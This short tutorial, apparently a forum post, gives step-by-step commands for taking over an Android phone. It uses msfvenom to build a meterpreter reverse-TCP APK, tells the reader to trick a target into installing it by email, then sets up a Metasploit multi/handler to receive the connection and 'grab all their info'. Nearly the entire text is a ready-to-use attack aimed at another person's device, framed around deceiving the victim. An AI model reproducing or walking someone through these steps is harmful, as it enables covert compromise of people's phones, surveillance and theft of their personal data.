Android smartphones (Hack)/(Takeover) 19Create a payload by typing the information below. Number 1, should be saved in your home folder.1. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.25 LPORT=8888 R> Manjohn.apkThe manjohn.apk file you send to your target, get them to install it.This will create the payload called program.apk (or whatever you name it), where you see the IP and port you need to put your i.p for the reverse connection to come back to you.The file you need to send to your target is a file named (program.apk). Send it to them by email or some other way.**Now open a new terminal and type the following below**2. Type & hit enter: msfconsole <---once open, than typ#2 Type & hit enter: use multi/handler Type & hit enter: set PAYLOAD android/meterpreter/reverse_tcp Type & hit enter: show options3. Now change the LHOST AND LPORT to yours, type ifconfig, type like this: TYPE" set LHOST 192.168.0.25 " HIT ENTER TYPE" set LPORT 8888 " HIT ENTER4. Type exploit and hit enter to start the exploit and wait for your connection.Once the person has installed/opened the program.apk you sent them, you can grab all their info.5. Type help and press enter for a list of commands to grab informationThank you for reading my android hack. It is fairly simple, but you can try it on your own phone first. If you need any help, just reply or message me.